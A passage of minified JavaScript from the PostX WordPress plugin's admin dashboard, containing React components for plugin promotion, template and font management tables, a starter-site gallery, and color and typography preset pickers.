2.9827Z"})),wow_revenue:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",width:"40",height:"40",fill:"none",viewBox:"0 0 48 48"},(0,a.createElement)("path",{fill:"#00A464",d:"M47.9999 47.9999H36L24 0h12l11.9999 47.9999Zm-12 0H24L12 15.96h12l11.9999 32.0399Zm-12 .0001H12L0 32.04h12L23.9999 48Z"})),wow_optin:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",width:"40",height:"40",fill:"none",viewBox:"0 0 48 48"},(0,a.createElement)("g",{fill:"#F97415",clipPath:"url(#optin_48_path)"},(0,a.createElement)("path",{d:"M28.7992 24.0373c0-2.6419-2.1581-4.8-4.8-4.8-2.6418 0-4.8 2.1581-4.8 4.8 0 2.6419 2.1582 4.8 4.8 4.8 2.6419 0 4.8-2.1581 4.8-4.8Z"}),(0,a.createElement)("path",{d:"M24 48.0372v-9.6c7.9256 0 14.4-6.4744 14.4-14.4S31.9256 9.63721 24 9.63721 9.6 16.1116 9.6 24.0372H0C0 10.7907 10.7535 0 24 0s24 10.7535 24 24-10.7535 24-24 24v.0372Z"}),(0,a.createElement)("path",{d:"m19.2 28.8369-19.2 6.4 8.8186 3.9814L12.8 48.0369l6.4372-19.2H19.2Z"})),(0,a.createElement)("defs",null,(0,a.createElement)("clipPath",{id:"optin_48_path"},(0,a.createElement)("path",{fill:"#fff",d:"M0 0h48v48H0z"})))),wow_addon:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",width:"40",height:"40",fill:"none",viewBox:"0 0 32 32"},(0,a.createElement)("rect",{width:"14.12",height:"14.12",x:"1",y:"16.88",fill:"#86A62C",rx:"3.53"}),(0,a.createElement)("rect",{width:"14.12",height:"14.12",x:"16.88",y:"1",fill:"#86A62C",rx:"3.53"}),(0,a.createElement)("path",{fill:"#86A62C",fillRule:"evenodd",d:"M1.38 2.93C1 3.68 1 4.67 1 6.65v2.82c0 1.98 0 2.97.38 3.72.34.66.88 1.2 1.55 1.54.75.39 1.74.39 3.72.39h2.82c1.98 0 2.97 0 3.72-.39.66-.34 1.2-.88 1.54-1.54.39-.75.39-1.74.39-3.72V6.65c0-1.98 0-2.97-.39-3.72a3.53 3.53 0 0 0-1.54-1.55C12.44 1 11.45 1 9.47 1H6.65c-1.98 0-2.97 0-3.72.38-.67.34-1.2.88-1.55 1.55Zm5.98 8.62 5.73-5.73-1.24-1.25-5.11 5.1-2.47-2.46-1.25 1.25 3.1 3.09c.34.34.9.34 1.24 0ZM16.88 22.53c0-1.98 0-2.97.39-3.72.34-.66.88-1.2 1.54-1.54.75-.39 1.74-.39 3.72-.39h2.82c1.98 0 2.97 0 3.72.39.67.34 1.2.88 1.55 1.54.38.75.38 1.74.38 3.72v2.82c0 1.98 0 2.97-.38 3.72-.34.67-.88 1.2-1.55 1.55-.75.38-1.74.38-3.72.38h-2.82c-1.98 0-2.97 0-3.72-.38a3.53 3.53 0 0 1-1.54-1.55c-.39-.75-.39-1.74-.39-3.72v-2.82Zm6.18.53v-3.09h1.76v3.09h3.1v1.76h-3.1v3.1h-1.76v-3.1h-3.09v-1.76h3.09Z",clipRule:"evenodd"}))},i={wholesale_x:{title:"WholesaleX",subtitle:`WholesaleX \n        ${__("is a B2B wholesale plugin featuring advanced wholesale pricing and customization features.","ultimate-post")}`,install:"installation url",pluginUrl:"https://getwholesalex.com/"},wow_store:{title:"WowStore",subtitle:`WowStore ${__("is a complete WooCommerce store builder featuring advanced options to improve sales!","ultimate-post")}`,install:"installation url",pluginUrl:"https://www.wpxpo.com/wowstore/"},wow_revenue:{title:"WowRevenue",subtitle:`WowRevenue ${__("boost sales and maximize revenue with the advanced discount campaigns of WowRevenue.","ultimate-post")}`,install:"installation url",pluginUrl:"https://www.wowrevenue.com/"},wow_optin:{title:"WowOptin",subtitle:`WowOptin ${__("generates actionable leads and boost sales with popups, banners, and floating bars using WowOptin.","ultimate-post")}`,install:"installation url",pluginUrl:"https://www.wowoptin.com/"},wow_addon:{title:"WowAddons",subtitle:`WowAddons ${__("extends the functionality of your WooCommerce store with additional features and options.","ultimate-post")}`,install:"installation url",pluginUrl:"https://www.wpxpo.com/product-addons-for-woocommerce/"}},l=()=>{const[e,t]=(0,a.useState)({}),[n,l]=(0,a.useState)(ultp_dashboard_pannel.products||{}),[s,p]=(0,a.useState)(!1),[c,d]=(0,a.useState)(ultp_dashboard_pannel.products_active||{}),u=e=>{t((t=>({...t,[e]:!0})));const n=new FormData;n.append("action","ultp_install_plugin"),n.append("wpnonce",ultp_dashboard_pannel.security),n.append("plugin",e),fetch(ultp_dashboard_pannel.ajax,{method:"POST",body:n}).then((e=>e.json())).then((()=>{})).catch((()=>{})).finally((()=>{t((t=>({...t,[e]:!1}))),l((t=>({...t,[e]:!0}))),d((t=>({...t,[e]:!0})))}))},m=(0,r.t)();return(0,a.useEffect)((()=>{p(!0),setTimeout((()=>{m.current&&p(!1)}),1e3)}),[]),(0,a.createElement)("div",{className:"ultp-plugins-wrapper"},(0,a.createElement)("div",{className:"ultp-plugin-items"},Object.keys(i).map(((t,r)=>((t,r)=>{const l=o[t]||null;return(0,a.createElement)("div",{key:r,className:"ultp-plugin-item"},(0,a.createElement)("div",{className:"ultp-plugin-item-title"},(0,a.createElement)("div",{className:"ultp-product-icon"},l),i[t].title),(0,a.createElement)("div",{className:"ultp-plugin-item-desc"},i[t].subtitle),(0,a.createElement)("div",{className:"ultp-plugin-item-action"},(0,a.createElement)(a.Fragment,null,c[t]?(0,a.createElement)("div",{className:"ultp-secondary-button ultp-activated-button"},__("Activated","ultimate-post")):(0,a.createElement)("div",{className:"ultp-secondary-button ultp-plugin-active-btn",onClick:()=>u(t),role:"button",tabIndex:-1,onKeyDown:e=>{"Enter"===e.key&&u(t)}},(0,a.createElement)("div",null,n[t]?__("Activate","ultimate-post"):__("Install","ultimate-post")),e[t]&&(0,a.createElement)("span",{className:"ultp-plugin-item-loading"}))),(0,a.createElement)("div",{className:"ultp-transparent-alter-button",role:"button",tabIndex:-1,onClick:()=>window.open(i[t].pluginUrl,"_blank"),onKeyDown:e=>{"Enter"===e.key&&window.open(i[t].pluginUrl,"_blank")}},__("Plugin Details","ultimate-post"))))})(t,r)))))}},5957:(e,t,n)=>{"use strict";n.d(t,{Z:()=>s});var a=n(7294),r=n(356),o=n(4766),i=n(4482),l=n(8949);n(6680);const{__}=wp.i18n,s=e=>{const[t,n]=(0,a.useState)([]),[s,p]=(0,a.useState)(!1),[c,d]=(0,a.useState)(1),[u,m]=(0,a.useState)(0),[f,h]=(0,a.useState)(""),[g,v]=(0,a.useState)(0),[_,w]=(0,a.useState)(!1),[b,x]=(0,a.useState)(""),[y,k]=(0,a.useState)([]),[E,C]=(0,a.useState)(""),[S,M]=(0,a.useState)(!1),[L,N]=(0,a.useState)({state:!1,status:""}),[Z,P]=(0,a.useState)(!1);(0,a.useEffect)((()=>(z(),document.addEventListener("mousedown",B),()=>document.removeEventListener("mousedown",B))),[]);const z=(t={})=>{A({action:"dashborad",data:Object.assign({},{type:"saved_templates",pages:c,pType:e.type},t)})},A=e=>{wp.apiFetch({path:"/ultp/v2/"+e.action,method:"POST",data:e.data}).then((t=>{if(t.success)switch(e.data.type){case"saved_templates":k(Array(t.data.length).fill(!1)),n(t.data),p(!(t.data.length>0)),h(t.new),m(t.found),v(t.pages),x(""),w(!1),e.data.search&&d(1);break;case"status":case"delete":case"duplicate":case"action_draft":case"action_delete":case"action_publish":z(),w(!1),N({status:e.data.type.includes("delete")?"error":"success",messages:[t.message],state:!0})}}))},B=e=>{e.target.parentNode.classList.contains("ultp-reserve-button")||(C(""),M(!1))};return(0,a.createElement)("div",{className:`ultp-${"ultp_templates"==e.type?"saved-template":"custom-font"}-container`},L.state&&(0,a.createElement)(r.Z,{delay:2e3,toastMessages:L,setToastMessages:N}),f?(0,a.createElement)(a.Fragment,null,"ultp_templates"==e.type&&!ultp_dashboard_pannel.active&&t?.length>0?(0,a.createElement)("a",{className:"ultp-primary-button cursor",onClick:()=>P(!0)},__("Add New","ultimate-post")):(0,a.createElement)(a.Fragment,null,(0,a.createElement)("a",{className:"ultp-primary-button ",target:"_blank",href:f,rel:"noreferrer"},__("Add New","ultimate-post")))):(0,a.createElement)(l.Z,{type:"custom_size",c_s:{size1:108,unit1:"px",size2:46,unit2:"px",br:4}}),(0,a.createElement)("div",{className:"tableCon"},(0,a.createElement)("div",{className:"ultp-bulk-con ultp-dash-item-con"},(0,a.createElement)("div",null,(0,a.createElement)("select",{value:b,onChange:e=>x(e.target.value)},(0,a.createElement)("option",{value:""},__("Bulk Action","ultimate-post")),(0,a.createElement)("option",{value:"publish"},__("Publish","ultimate-post")),(0,a.createElement)("option",{value:"draft"},__("Draft","ultimate-post")),(0,a.createElement)("option",{value:"delete"},__("Delete","ultimate-post"))),(0,a.createElement)("a",{className:"ultp-primary-button cursor",onClick:()=>{const e=y.filter((e=>Number.isInteger(e)));b&&e.length>0&&("delete"==b?confirm("Are you sure you want to apply the action?")&&A({action:"dashborad",data:{type:"action_"+b,ids:e}}):A({action:"dashborad",data:{type:"action_"+b,ids:e}}))}},__("Apply","ultimate-post"))),(0,a.createElement)("input",{type:"text",placeholder:"Search...",onChange:e=>{z({search:e.target.value})}})),(0,a.createElement)("div",{className:"ultpTable"},(0,a.createElement)("table",{className:0!=t.length||s?"":"skeletonOverflow"},(0,a.createElement)("thead",null,(0,a.createElement)("tr",null,(0,a.createElement)("th",null,(0,a.createElement)("input",{type:"checkbox",checked:_,onChange:e=>{k(_?Array(t.length).fill(!1):t.map((e=>e.id))),w(!_)}})),(0,a.createElement)(a.Fragment,null,"ultp_templates"==e.type?(0,a.createElement)(a.Fragment,null,(0,a.createElement)("th",{className:"title"},__("Title","ultimate-post")),(0,a.createElement)("th",null,__("Shortcode","ultimate-post"))):(0,a.createElement)(a.Fragment,null,(0,a.createElement)("th",{className:"title"},__("Font Family","ultimate-post")),(0,a.createElement)("th",{className:"fontpreview"},__("Preview","ultimate-post")),(0,a.createElement)("th",{className:"fontType"},__("WOFF","ultimate-post")),(0,a.createElement)("th",{className:"fontType"},__("WOFF2","ultimate-post")),(0,a.createElement)("th",{className:"fontType"},__("TTF","ultimate-post")),(0,a.createElement)("th",{className:"fontType"},__("SVG","ultimate-post")),(0,a.createElement)("th",{className:"fontType"},__("EOT","ultimate-post"))),(0,a.createElement)("th",{className:"dateHead"},__("Date","ultimate-post")),(0,a.createElement)("th",null,__("Action","ultimate-post"))))),(0,a.createElement)("tbody",null,t?.map(((t,n)=>(0,a.createElement)("tr",{key:n},(0,a.createElement)("td",null,(0,a.createElement)("input",{type:"checkbox",checked:!!y[n],onChange:()=>{const e=[...y];e.splice(n,1,!y[n]&&t.id),k(e)}})),(t=>{let n="",r={fontFamily:"",fontWeight:""};if("ultp_templates"!=e.type&&t?.font_settings?.length>0){const e=t.font_settings[0],a=[];e.woff&&a.push(`url(${e.woff}) format('woff')`),e.woff2&&a.push(`url(${e.woff2}) format('woff2')`),e.ttf&&a.push(`url(${e.ttf}) format('TrueType')`),e.svg&&a.push(`url(${e.svg}) format('svg')`),e.eot&&a.push(`url(${e.eot}) format('eot')`),n+=` @font-face {\n                font-family: "${t.title}";\n                font-weight: ${e.weight};\n                font-display: auto;\n                src: ${a.join(", ")};\n            } `,r={fontFamily:t.title,fontWeight:e.weight}}return(0,a.createElement)(a.Fragment,null,"ultp_templates"==e.type?(0,a.createElement)(a.Fragment,null,(0,a.createElement)("td",{className:"title"},(0,a.createElement)("a",{href:t?.edit?.replace("&amp;","&"),target:"_blank",rel:"noreferrer"},t.title||"Untitled")),(0,a.createElement)("td",null,(0,a.createElement)("span",{className:"shortCode",onClick:e=>{(e=>{let t=!1;if(navigator.clipboard)t=navigator.clipboard.writeText(e.target.innerHTML);else{const n=document.createElement("input");n.setAttribute("value",e.target.innerHTML),document.body.appendChild(n),n.select(),t=document.execCommand("copy"),document.body.removeChild(n)}if(t){const t=document.createElement("span");t.innerText="Copied!",e.target.appendChild(t),setTimeout((()=>{e.target.removeChild(t)}),800)}})(e)}},'[postx_template id="',t.id,'"]'))):(0,a.createElement)(a.Fragment,null,(0,a.createElement)("td",{className:"title"},(0,a.createElement)("a",{href:t?.edit?.replace("&amp;","&"),target:"_blank",rel:"noreferrer"},t.title||"Untitled")),t.title&&(0,a.createElement)("style",{type:"text/css"},n),(0,a.createElement)("td",{style:r},__("The quick brown fox jumps over the lazy dog.","ultimate-post")),(0,a.createElement)("td",{className:"fontType"},(0,a.createElement)("span",{className:"dashicons "+(t.woff?"dashicons-yes":"dashicons-no-alt")})),(0,a.createElement)("td",{className:"fontType"},(0,a.createElement)("span",{className:"dashicons "+(t.woff2?"dashicons-yes":"dashicons-no-alt")})),(0,a.createElement)("td",{className:"fontType"},(0,a.createElement)("span",{className:"dashicons "+(t.ttf?"dashicons-yes":"dashicons-no-alt")})),(0,a.createElement)("td",{className:"fontType"},(0,a.createElement)("span",{className:"dashicons "+(t.svg?"dashicons-yes":"dashicons-no-alt")})),(0,a.createElement)("td",{className:"fontType"},(0,a.createElement)("span",{className:"dashicons "+(t.eot?"dashicons-yes":"dashicons-no-alt")}))))})(t),(0,a.createElement)("td",{className:"typeDate"},"publish"==t.status?"Published":t.status," ",(0,a.createElement)("br",null),t.date),(0,a.createElement)("td",null,(0,a.createElement)("span",{className:"actions ultp-reserve-button",onClick:e=>{M(!S),C(t.id)}},(0,a.createElement)("span",{className:"dashicons dashicons-ellipsis"}),E==t.id&&S&&(0,a.createElement)("ul",{className:"ultp-dash-item-con actionPopUp ultp-reserve-button"},(0,a.createElement)("li",{className:"ultp-reserve-button"},(0,a.createElement)("a",{target:"_blank",href:t?.edit?.replace("&amp;","&"),rel:"noreferrer"},(0,a.createElement)("span",{className:"dashicons dashicons-edit-large"}),__("Edit","ultimate-post"))),(0,a.createElement)("li",{onClick:e=>{C(""),M(!1),e.preventDefault(),confirm("Are you sure?")&&A({action:"template_action",data:{type:"status",id:t.id,status:"publish"==t.status?"draft":"publish"}})}},(0,a.createElement)("span",{className:"dashicons dashicons-open-folder"}),__("Set to","ultimate-post")," ","draft"==t.status?"Publish":"Draft"),(0,a.createElement)("li",{onClick:e=>{C(""),M(!1),e.preventDefault(),confirm("Are you sure you want to delete?")&&A({action:"template_action",data:{type:"delete",id:t.id}})}},(0,a.createElement)("span",{className:"dashicons dashicons-trash"}),__("Delete","ultimate-post")),"ultp_templates"==e.type&&(0,a.createElement)("li",{onClick:e=>{C(""),M(!1),e.preventDefault(),confirm("Are you sure you want to duplicate this template?")&&A({action:"template_action",data:{type:"duplicate",id:t.id}})}},(0,a.createElement)("span",{className:"dashicons dashicons-admin-page"}),__("Duplicate","ultimate-post")))))))),0==t.length&&s&&(0,a.createElement)("tr",null,"ultp_templates"==e.type?(0,a.createElement)("td",{colSpan:5},(0,a.createElement)("div",{className:"ultp_h2"},__("No Data Found !!!","ultimate-post"))):(0,a.createElement)("td",{colSpan:10},(0,a.createElement)("div",{className:"ultp_h2"},__("No Data Found !!!","ultimate-post")))),0==t.length&&!s&&(0,a.createElement)(a.Fragment,null,Array(5).fill(1).map(((t,n)=>(0,a.createElement)("tr",{key:n},(0,a.createElement)("td",null,(0,a.createElement)(l.Z,{type:"custom_size",c_s:{size1:22,unit1:"px",size2:20,unit2:"px",br:4}})),"ultp_templates"==e.type?(0,a.createElement)(a.Fragment,null,Array(4).fill(1).map(((e,t)=>(0,a.createElement)("td",{key:t},(0,a.createElement)(l.Z,{type:"title",size:"99"}))))):(0,a.createElement)(a.Fragment,null,Array(9).fill(1).map(((e,t)=>(0,a.createElement)("td",{key:t},(0,a.createElement)(l.Z,{type:"title",size:"99"})))))))))))),(0,a.createElement)("div",{className:"pageCon"},(0,a.createElement)("div",null,__("Page","ultimate-post")," ",g>0?c:g," ",__("of","ultimate-post")," ",g," ["," ",u," ",__("items","ultimate-post")," ]"),g>0&&(0,a.createElement)("div",{className:"ultpPages"},c>1&&(0,a.createElement)("span",{onClick:()=>{const e=c-1;z({pages:e}),d(e)}},o.ZP.leftAngle2),(0,a.createElement)("span",{className:"currentPage"},c),g>c&&(0,a.createElement)("span",{onClick:()=>{const e=c+1;z({pages:e}),d(e)}},o.ZP.rightAngle2)))),Z&&(0,i.cs)({tags:"menu_save_temp_pro",func:e=>{P(e)},data:{icon:"saved_template_lock.svg",title:__("Create Unlimited Saved Templates with PostX Pro","ultimate-post"),description:__("You can create only one saved template with the free version of PostX. Please upgrade to a pro plan to create unlimited saved templates.","ultimate-post")}}))}},3554:(e,t,n)=>{"use strict";n.d(t,{Z:()=>d});var a=n(7294),r=n(1383),o=n(448),i=n(4766),l=n(8949),s=n(356),p=n(814),c=n(6488);const{__}=wp.i18n,d=e=>{const[t,n]=(0,a.useState)({templates:[],designs:[],reloadId:"",reload:!1,isTemplate:!0,error:!1,fetching:!1,loading:!1}),[d,u]=(0,a.useState)(""),[m,f]=(0,a.useState)("all"),[h,g]=(0,a.useState)("all"),[v,_]=(0,a.useState)("all"),[w,b]=(0,a.useState)([]),[x,y]=(0,a.useState)(!1),[k,E]=(0,a.useState)({state:!1,status:""}),[C,S]=(0,a.useState)("3"),[M,L]=(0,a.useState)(""),[N,Z]=(0,a.useState)([]),{loading:P,fetching:z}=t,A=(0,r.t)(),B=async()=>{n((e=>({...e,loading:!0}))),wp.apiFetch({path:"/ultp/v2/fetch_premade_data",method:"POST",data:{type:"starter_lists"}}).then((e=>{if(e.success&&A.current&&e.data){const t=JSON.parse(e.data);Z(t),n((e=>({...e,loading:!1})))}}))},H=[{value:"all",label:__("All Categories","ultimate-post")},{value:"news",label:__("News","ultimate-post")},{value:"magazine",label:__("Magazine","ultimate-post")},{value:"blog",label:__("Blog","ultimate-post")},{value:"sports",label:__("Sports","ultimate-post")},{value:"fashion",label:__("Fashion","ultimate-post")},{value:"tech",label:__("Tech","ultimate-post")},{value:"travel",label:__("Travel","ultimate-post")},{value:"food",label:__("Food","ultimate-post")},{value:"movie",label:__("Movie","ultimate-post")},{value:"health",label:__("Health","ultimate-post")},{value:"gaming",label:__("Gaming","ultimate-post")},{value:"nft",label:__("NFT","ultimate-post")}];(0,a.useEffect)((()=>{T("","","fetchData"),B()}),[]);const T=(e,t="",n="")=>{wp.apiFetch({path:"/ultp/v2/premade_wishlist_save",method:"POST",data:{id:e,action:t,type:n}}).then((e=>{e.success&&A.current&&(b(Array.isArray(e.wishListArr)?e.wishListArr:Object.values(e.wishListArr||{})),"fetchData"!=n&&E({status:"success",messages:[e.message],state:!0}))}))};if(M){document.querySelector("#adminmenumain").style="display: none;",document.querySelector(".ultp-settings-container").style="min-height: unset;";const e=N.filter((e=>e.live==M))[0];return(0,a.createElement)(p.Z,{_val:e,setLiveUrl:L,liveUrl:M})}document.querySelector("#adminmenumain").style="",document.querySelector(".ultp-settings-container").style="";let R=(0,o.cC)(w.join(""),[]);R&&"object"==typeof R&&!Array.isArray(R)&&(R=Object.keys(R).sort(((e,t)=>e-t)).map((e=>R[e])));const O=N.map((e=>e.ID)).sort(((e,t)=>t-e)).slice(0,3);return(0,a.createElement)(a.Fragment,null,(0,a.createElement)("div",{className:"ultp-templatekit-wrap"},k.state&&(0,a.createElement)(s.Z,{delay:2e3,toastMessages:k,setToastMessages:E}),(0,a.createElement)("div",{className:"ultp-templatekit-list-container "},(0,a.createElement)(c.Z,{changeStates:(e,t)=>{"freePro"==e?_(t):"search"==e?u(t):"column"==e?S(t):"wishlist"==e?y(t):"trend"==e?(f(t),"latest"==t||"all"==t?N.sort(((e,t)=>t.ID-e.ID)):"popular"==t&&N[0]&&N[0].hit&&N.sort(((e,t)=>t.hit-e.hit))):"filter"==e&&g(t)},useState:a.useState,useEffect:a.useEffect,useRef:a.useRef,column:C,showWishList:x,_fetchFile:()=>{n((e=>({...e,fetching:!0}))),wp.apiFetch({path:"/ultp/v2/fetch_premade_data",method:"POST",data:{type:"fetch_all_data"}}).then((e=>{e.success&&A.current&&(B(),n((e=>({...e,fetching:!1}))),E({status:"success",messages:[e.message],state:!0}))}))},fetching:z,searchQuery:d,fields:{filter:!0,trend:!0,freePro:!0},fieldOptions:{filterArr:H,trendArr:[],freeProArr:[]},fieldValue:{filter:h,trend:m,freePro:v}}),N.length>0?(0,a.createElement)(a.Fragment,null,(0,a.createElement)("div",{className:"ultp-premade-grid ultp-templatekit-col"+C},N.map((e=>e.title?.toLowerCase().includes(d.toLowerCase())&&("all"==h||"all"!=h&&(h==e.category||(Array.isArray(e.parent_cat)?e.parent_cat:Object.values(e.parent_cat||{})).includes(h)))&&("all"==v||"pro"==v&&e.pro||"free"==v&&!e.pro)&&(!x||x&&R?.includes(e.ID))&&(0,a.createElement)("div",{key:e.ID,className:"ultp-item-wrapper ultp-starter-group "},(0,a.createElement)("div",{className:"ultp-item-list"},(0,a.createElement)("div",{className:"ultp-item-list-overlay"},(0,a.createElement)("a",{className:"ultp-templatekit-img bg-image-aspect",href:"#",style:{backgroundImage:`url(https://postxkit.wpxpo.com/${e.live}/wp-content/uploads/sites/${e.ID}/postx_importer_img/pages/home.jpg)`}}),(0,a.createElement)("div",{className:"ultp-list-dark-overlay"},!ultp_dashboard_pannel.active&&(0,a.createElement)(a.Fragment,null,e.pro?(0,a.createElement)("span",{className:"ultp-templatekit-premium-btn"},__("Pro","ultimate-post")):(0,a.createElement)("span",{className:"ultp-templatekit-premium-btn ultp-templatekit-premium-free-btn"},__("Free","ultimate-post"))),(0,a.createElement)("a",{className:"ultp-overlay-view ultp-dashboverlay",onClick:()=>L(e.live)},i.ZP.eye,__("Live Preview","ultimate-post"))),e.pro&&(0,a.createElement)("div",{className:"ultp-list-info-tag-pro"},(0,a.createElement)("span",null,"PRO"))),(0,a.createElement)("div",{className:"ultp-item-list-info"},(0,a.createElement)("div",{className:"ultp-list-info",onClick:()=>L(e.live)},(0,a.createElement)("div",{className:"ultp-list-info-title"},e.title,O.includes(e.ID)&&(0,a.createElement)("div",{className:"ultp-list-info-tag-new"},"NEW")),(0,a.createElement)("div",{className:"ultp-list-info-count"},e.templates?.length&&e.templates?.length+" templates")),(0,a.createElement)("span",{className:"ultp-action-btn"},(0,a.createElement)("span",{className:"ultp-premade-wishlist",onClick:()=>{T(e.ID,R?.includes(e.ID)?"remove":"")}},i.ZP[R?.includes(e.ID)?"love_solid":"love_line"]))))))))):P?(0,a.createElement)("div",{className:"ultp-premade-grid skeletonOverflow ultp-templatekit-col"+C},Array(25).fill(1).map(((e,t)=>(0,a.createElement)("div",{key:t,className:"ultp-item-list"},(0,a.createElement)("div",{className:"ultp-item-list-overlay"},(0,a.createElement)(l.Z,{type:"custom_size",c_s:{size1:100,unit1:"%",size2:440,unit2:"px"}})),(0,a.createElement)("div",{className:"ultp-item-list-info"},(0,a.createElement)(l.Z,{type:"custom_size",c_s:{size1:50,unit1:"%",size2:25,unit2:"px",br:2}}),(0,a.createElement)("span",{className:"ultp-action-btn"},(0,a.createElement)("span",{className:"ultp-premade-wishlist"},(0,a.createElement)(l.Z,{type:"custom_size",c_s:{size1:30,unit1:"px",size2:25,unit2:"px",br:2}})))))))):(0,a.createElement)("span",{className:"ultp-image-rotate"},__("No Data Available…","ultimate-post")))))}},4371:(e,t,n)=>{"use strict";n.d(t,{Z:()=>i});var a=n(7294),r=n(448),o=n(5404);const{__}=wp.i18n,i=({ultpPresetColors:e,currentPresetColors:t,setCurrentPresetColors:n,setCurrentPostxGlobal:i,currentPostxGlobal:l})=>{const s={...e,rootCSS:(0,r.AJ)("styleCss",e)},[p,c]=(0,a.useState)({...t,...s}),[d,u]=(0,a.useState)(""),[m,f]=(0,a.useState)(!1),h=(0,r.AJ)("colorStacks"),g=(0,r.AJ)("presetColorKeys");(0,a.useEffect)((()=>{(0,r.x2)("get","ultpPresetColors","",(e=>{if(e.data){const t={...e.data,...p};n({...t,rootCSS:(0,r.AJ)("styleCss",t)})}}))}),[]);const v=(e,a="")=>{let o={...t,...e};"darkhandle"!=a&&m&&(o=_(o));const i=((e={},t="")=>{const n=(0,r.AJ)("styleCss",e),a=document.querySelector("#ultp-starter-preview");if(a.contentWindow){const e={type:"replaceColorRoot",id:"#ultp-preset-colors-style-inline-css",styleCss:n,dlMode:"darkhandle"==t?m?"ultpLight":"ultpDark":m?"ultpDark":"ultpLight"};a.contentWindow.postMessage(e,"*")}return n})(o,a);c(o),n({...o,rootCSS:i})},_=(e={})=>({...e,Base_1_color:e.Contrast_1_color,Base_2_color:e.Contrast_2_color,Base_3_color:e.Contrast_3_color,Contrast_1_color:e.Base_1_color,Contrast_2_color:e.Base_2_color,Contrast_3_color:e.Base_3_color});return(0,a.createElement)("div",{className:"ultp_starter_preset_container"},(0,a.createElement)("div",{className:"ultp_starter_dark_container"},(0,a.createElement)("div",{onClick:()=>(()=>{const e=_(t);document.querySelector(".ultp-dl-container .ultp-dl-svg-con").style=`transform: translateX(${m?"":"calc( 100% + 71px )"}); transition: transform .4s ease`,document.querySelector(".ultp-dl-container .ultp-dl-svg-title").style=`transform: translateX(${m?"":"calc( -100% + 50px )"}); transition: transform .4s ease`,setTimeout((()=>{f(!m),i({...l,enableDark:!m}),v(e,"darkhandle")}),400)})(),className:" ultp-dl-container "},(0,a.createElement)("div",{className:"ultp-dl-svg-con "+(m?"dark":"")},(0,a.createElement)("div",{className:"ultp-dl-svg"},o.Z[m?"moon":"sun"])),(0,a.createElement)("div",{className:"ultp-dl-svg-title"},m?"Dark Mode":"Light Mode"))),(0,a.createElement)("div",{className:"ultp_starter_reset_container"},(0,a.createElement)("div",{className:"packs_title"},__("Change Color Palette","ultimate-post")),d&&(0,a.createElement)("span",{className:"dashicons dashicons-image-rotate",onClick:()=>{u(""),v(s)}})),(0,a.createElement)("ul",{className:"ultp-color-group"},h.map(((e,t)=>(0,a.createElement)("li",{className:"ultp_starter_preset_list "+(d==t+1?"active":""),key:t,onClick:()=>{const n={};u(t+1),g.forEach(((t,a)=>{n[t]=e[a]})),v(n)}},e.map(((e,t)=>![1,2,6,8,9].includes(t+1)&&(0,a.createElement)("span",{key:t,className:"ultp-global-color",style:{backgroundColor:e}}))))))))}},5066:(e,t,n)=>{"use strict";n.d(t,{Z:()=>o});var a=n(7294),r=n(448);const{__}=wp.i18n,o=({ultpPresetTypos:e,currentPresetTypos:t,setCurrentPresetTypos:n})=>{const o={...e,presetTypoCSS:(0,r.AJ)("typoCSS",e,!0)},[i,l]=(0,a.useState)({...t,...o}),[s,p]=(0,a.useState)(""),c=(0,r.AJ)("presetTypoKeys"),d=(0,r.AJ)("typoStacks");(0,a.useEffect)((()=>{(0,r.x2)("get","ultpPresetTypos","",(e=>{if(e.data){const t={...e.data,...i};l({...t,presetTypoCSS:(0,r.AJ)("typoCSS",t,!0)}),n({...t,presetTypoCSS:(0,r.AJ)("typoCSS",t,!0)})}}))}),[]);const u=e=>{const a={...t,...e},o=((e={})=>{const t=(0,r.AJ)("typoCSS",e,!0),n=document.querySelector("#ultp-starter-preview");if(n.contentWindow){const e={type:"replaceColorRoot",id:"#ultp-preset-typo-style-inline-css",styleCss:t};n.contentWindow.postMessage(e,"*")}return t})(a);l(a),n({...a,presetTypoCSS:o})};return(0,a.createElement)("div",{className:"ultp_starter_preset_container"},(0,a.createElement)("div",{className:"ultp_starter_reset_container"},(0,a.createElement)("div",{className:"packs_title"},__("Change Font & Typography","ultimate-post")),s&&(0,a.createElement)("span",{className:"dashicons dashicons-image-rotate",onClick:()=>{p(""),u(o)}})),(0,a.createElement)("ul",{className:"ultp-typo-group"},d.map(((e,n)=>(0,a.createElement)("li",{title:`${e[0].family}/${e[1].family}`,className:"ultp_starter_preset_typo_list "+(s==n+1?"active":""),key:n,onClick:()=>{const a={};p(n+1),c.forEach(((n,r)=>{a[n]={...t[n]},a[n].family=e[r].family,a[n].type=e[r].type,a[n].weight=e[r].weight})),u(a)}},e.map(((e,t)=>(0,a.createElement)("span",{key:t},(0,a.createElement)("style",null,(0,r.AJ)("font_load",e,!0)),(0,a.createElement)("span",{key:t,className:"",style:{fontFamily:`${e.family}, ${e.type}`}},0==t?"A":"a")))))))))}},5324:(e,t,n)=>{"use strict";n.d(t,{Z:()=>o});var a=n(7294),r=n(4766);const o=e=>{const{useState:t,useEffect:n,useRef:o,onChange:i,options:l,value:s,contentWH:p}=e,[c,d]=t(!1),u=o(null),m=e=>{u?.current&&!u?.current.contains(e.target)?d(!1):u?.current&&u?.current.contains(e.target)&&!e.target.classList?.contains("ultp-reserve-button")&&d(!u?.current.classList?.contains("open"))};n((()=>(document.addEventListener("mousedown",m),()=>document.removeEventListener("mousedown",m))),[]);const f=l?.find((e=>e.value===s));return(0,a.createElement)("div",{ref:u,className:"starter_filter_select "+(c?"open":"")},(0,a.createElement)("div",{className:"starter_filter_selected"},f?f.label:"Select an option",r.ZP.collapse_bottom_line),c&&(0,a.createElement)("ul",{className:"starter_filter_select_options",style:{minWidth:p?.width||"100px",maxHeight:p?.height||"160px"}},l.map(((e,t)=>(0,a.createElement)("li",{className:"ultp-reserve-button starter_filter_select_option",key:t,onClick:()=>(e=>{d(!1),i(e.value)})(e)},e.label)))))}},814:(e,t,n)=>{"use strict";n.d(t,{Z:()=>c});var 